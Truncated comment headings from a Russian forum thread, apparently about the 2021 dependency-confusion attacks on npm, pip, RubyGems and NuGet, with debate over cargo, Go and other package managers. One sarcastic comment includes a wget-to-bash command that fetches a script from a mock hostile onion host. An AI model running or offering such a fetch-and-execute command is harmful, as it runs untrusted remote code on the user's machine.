- Нужно больше зависимостей и скриптов установки ,
Leftpad, 10-Фев-21, 11:03 (1)
//
- нужно больше содержательных комментариев на опеннет ру,
Лудакрис, 10-Фев-21, 11:08 (3)
//
- Не зря же в расте даже базовые возможности - во внешних модулях Растаманы приго,
Аноним, 10-Фев-21, 11:18 (8)
//
- Больше зависимостей богу зависимостей Да здравствует leftpad ,
Аноним, 10-Фев-21, 11:20 (10)
//
- Нужно больше васянских библиотек и костылей на вызов одной функции ,
Dzen Python, 10-Фев-21, 12:50 (38)
//
- Правильно, если у тебя в большом проекте 1 000 000 однострочников и ты использов,
Аноним, 10-Фев-21, 13:08 (48)
//
- Вообще-то, когда приходится фиксить сотни чужих пакетов, это достаточный повод с,
YetAnotherOnanym, 10-Фев-21, 14:19 (84)
//
- Так писали наши деды Раньше позорным считалось переиспользование кода не только,
Аноним, 10-Фев-21, 15:06 (102)
//
- то ты сделал что-то ну вот вообще совсем не так ,
Аноним, 12-Фев-21, 03:39 (185)
- Вообще от зависимостей надо лечиться, а то в диспансер на учёт поставят ,
InuYasha, 10-Фев-21, 22:27 (153)
- Ваш комментарий в моей голове был озвучен голосом нежити из Варкрафта 3 ,
Аноним, 15-Фев-21, 14:14 (200)
- всё гениальное просто,
Леголас, 10-Фев-21, 11:06 (2)
//
- Всё ещё проще -- надо было просто придумать гит и гитхабы Смузисосы-линуксоиды,,
DildoZilla, 10-Фев-21, 11:14 (4)
- Дыра Раста проблема тоже касается ,
Аноним, 10-Фев-21, 11:15 (5)
//
- а есть упоминание читайте внимательнее, глупые аноны, это нелегко, знаю, но пыт,
Лудакрис, 10-Фев-21, 11:36 (18)
//
- Нет упоминанй, потому что Растом и его пакетником в не пользуются ,
Аноним, 10-Фев-21, 11:41 (21)
- Не хами ,
Аноним, 10-Фев-21, 11:42 (22)
- Я не тот анон, но там написано в других системах, таких как и дальше привод,
Аноним, 10-Фев-21, 13:12 (49)
//
- Нет, там нужно указывать registry, откуда качать пакет ,
Ананимус, 10-Фев-21, 11:53 (25)
- Не раста, а cargo Именно эта не касается, тк зависимости качаются по дефолту с ,
cheater, 10-Фев-21, 12:03 (30)
//
- Да, это проблема и не только cargo, но и всего раста, потому что все используют ,
Аноним, 10-Фев-21, 12:09 (32)
//
- cargo умеет работать с git-репозиториями и локальными пакетами ,
Siborgium, 10-Фев-21, 12:28 (37)
- И На локальные пакеты он сможет сослаться в уже скомпилированном состоянии А на,
Dzen Python, 10-Фев-21, 12:53 (39)
- Мне интереснее, а можно ли при сборке приложения с помощью cargo использовать то,
Аноним, 10-Фев-21, 12:54 (41)
- Позволен git, путь, и crates io Можно создать свой https github com rust-lang,
Аноним, 10-Фев-21, 13:43 (70)
- Это unsafe и не позволяет делать запланированное устаревание,
Аноним, 10-Фев-21, 17:56 (128)
- Вопрос не очень понятен 99 999 процентов пакетов в расте имеют внешние завис,
cheater, 10-Фев-21, 18:25 (134)
- Да, уважающие себя дистрибутивы, вроде Дебиана и Федоры так и делают, поэтому в ,
Аноним, 10-Фев-21, 20:29 (149)
- Если у тебя конечно есть доступ к репозиторию ,
Аноним, 10-Фев-21, 12:22 (34)
- А при чем тут Раст Он же не скриптовый вроде,
Аноним, 10-Фев-21, 12:24 (35)
//
- а там написано, но это ж читать букавки надо, чему многи не обучены ,
Аноним, 10-Фев-21, 23:38 (156)
- в русте зависимости ставятся через wget https sploit onion l33t sh 124 bash,
Аноним, 14-Фев-21, 23:56 (199)
- Рекомендации по защите не работают Работает только система, которая безопасна из,
тоже Аноним, 10-Фев-21, 11:17 (7)
- Они что, объявляли их просто как пакеты, а не ссылкой на каталог файл типа file ,
Lex, 10-Фев-21, 11:20 (11)
//
- Так им всем и надо ,
ryoken, 10-Фев-21, 11:32 (14)
- Руст или вообще какой-нибудь петон Мы то знаем ,
Аноним, 10-Фев-21, 11:46 (23)
- А как они узнали их имена ,
Аноним, 10-Фев-21, 11:51 (24)
//
- А если кто то забудет там пароли
, Аноним, 10-Фев-21, 11:55 (26)
//
- ну например если дотнет то прям в файле проекта PackageReference Include Fck U ,
kissmyass, 10-Фев-21, 12:02 (29)
//
- а если доступа к коду нет, но есть к бинарникам, то обычно одна ассембли - один ,
kissmyass, 10-Фев-21, 12:04 (31)
- Использовали бы FreeBSD и её дерево портов, проблем бы не было ,
bsdun, 10-Фев-21, 11:58 (27)
- Я тоже немного офигел когда приватные пакеты искались на nuget orgСамый очевидны,
kissmyass, 10-Фев-21, 11:58 (28)
//
- Зависимости эт плохо пнятненько,
Fracta1L, 10-Фев-21, 12:10 (33)
//
- Сильвупле,
Сишные дырени, 10-Фев-21, 20:09 (148)
- composer у php не подвержен такой бяке ,
qweqwe, 10-Фев-21, 12:27 (36)
//
- Защита методом безопасность через неясность - говно В нормальных компаниях про,
Аноним, 10-Фев-21, 12:54 (42)
//
- Это где так ,
Аноним, 10-Фев-21, 12:57 (43)
//
- банк,
Атон, 10-Фев-21, 21:12 (151)
//
- В нормальных компаниях к тому моменту, когда они выкладывают код имеют зрелый пр,
Dzen Python, 10-Фев-21, 12:58 (44)
- Если уж этим на проверены службой безопасности не хватает, то где тогда норма,
Аноним, 10-Фев-21, 13:05 (46)
- втф ловите эльфа наркомана ,
JL2001, 10-Фев-21, 14:23 (87)
//
- Этот случай только лишний раз доказывает ущербность идеи автоматических пакетов,
Gogi, 10-Фев-21, 13:02 (45)
//
- Может наоборот Там где комерческое - то пофиг, барин то платит ,
Аноним, 10-Фев-21, 13:06 (47)
//
- а линуксы в продакшене ты как обновляешь, братюнь зы какова ответственность ред,
JL2001, 10-Фев-21, 14:28 (89)
//
- Поддерживаю Собственно поэтому приходится у себя в гит репозитории хранить все ,
Аноним, 10-Фев-21, 19:01 (139)
- Против выступать легко А что в замен предложите ,
anonymous, 11-Фев-21, 11:17 (171)
- Так я и не понял, это баг или фича ,
Андрей, 10-Фев-21, 13:13 (50)
//
- И как раст от такого спасет А вы говорите безопасный язык А раст такая же дыре,
Аноним, 10-Фев-21, 13:15 (52)
//
- Не глупо ли это само по себе - выкладывать на публику проекты, зависящие от неоп,
Аноним, 10-Фев-21, 13:21 (55)
//
- запускайте npm pip gems install на машинах разработчиков без изоляции, он вам и ,
Аноним, 10-Фев-21, 13:27 (61)
//
- чо там, пацаны, давно в vlc-ppa публиковали linux-generic-7 0 1 ,
JL2001, 10-Фев-21, 13:30 (64)
- pred post-install запускать от рута, говорили они, ничего не будет, всегда так д,
JL2001, 10-Фев-21, 13:36 (66)
//
- Мой любимый кошмар на работе - почти каждый проект закачивает пол интернета при ,
PetrG, 10-Фев-21, 13:44 (71)
//
- А как же Perl 3,
Аноним, 10-Фев-21, 13:49 (74)
//
- вот тебе и DevУпс ,
Аноним, 10-Фев-21, 13:55 (77)
- Очевидная атака Удивительно что такие компании при сборке используют зависимост,
Аноним, 10-Фев-21, 14:01 (80)
//
- Для пистона это норма Даже прожекты с мегатоннами звест на гитхубе, имеют мегат,
Аноним, 10-Фев-21, 14:07 (83)
//
- А что разве в GO уже переделали Раньше в GO чтобы цеплять файлы с гитхаба нужн,
Аноним, 10-Фев-21, 14:54 (94)
//
- Чем проще разработка, тем проще эксплуатация уязвимостей ,
Оуноуним, 10-Фев-21, 14:56 (96)
//
- Странно что никто не озадачился проверкой базовых образов на которых собираются ,
Erley, 10-Фев-21, 15:23 (105)
//
- Так-то вендоринг в golang великая сила Правда, это тоже не спасёт, если внешний,
Брат Анон, 10-Фев-21, 16:09 (111)
- Хахаха npn, pip , rubygems В следующем выпуске ржавый карго Бугага Сейчас его ,
Аноним, 10-Фев-21, 17:01 (117)
//
- Похоже, что пакетный ад Javascript дал о себе знать ,
Аноним, 10-Фев-21, 17:17 (120)
//
- Вообще-то когда скачивается пакет, должна подпись проверяться ,
Аноним, 10-Фев-21, 17:24 (121)
//
- Зачем тестировать Просто пользуйтесь Пользуйтесь все Пока гром не грянет, муж,
mumu, 10-Фев-21, 17:24 (122)
//
- Всего 130 тысяч долларов, за такую черную ды ру, вас на ,
Аноним, 10-Фев-21, 17:49 (123)
//
- Вот зачем девопсы нужны ,
Аноним, 10-Фев-21, 18:15 (131)
//
- Девляпсы опять налетели на проблемы говнорепозитариев Удивительно, правда ,
Аноним, 10-Фев-21, 19:07 (140)
//
- 75 от всех зафиксированных запусков кода были связаны с загрузкой NPM- Вот это ,
srgazh, 11-Фев-21, 00:13 (158)
- Молодец человек Увидел возможность, реализовал и очень не плохо на ней заработал,
Ilya Indigo, 11-Фев-21, 01:01 (159)
//
- Внешние автоматически выкачиваемые зависимости 8212 это всегда риск А вдруг з,
Аноним, 11-Фев-21, 02:10 (160)
//
- Вот кто бы сомневался во всех этох npn, ruby-чего-то там Там же будет и всё оста,
deeaitch, 11-Фев-21, 04:05 (165)
- Надуманная проблема для python --extra-index-url там никто не использует, кроме ,
Аноним, 11-Фев-21, 05:16 (166)
- А как выполнить произвольный код в NuGet-пакете после его загрузки, если ни один,
.NET, 11-Фев-21, 14:09 (173)
- Другим урок Расслабляться нельзя Всё время надо быть на чеке ,
Аноним, 12-Фев-21, 14:43 (191)
|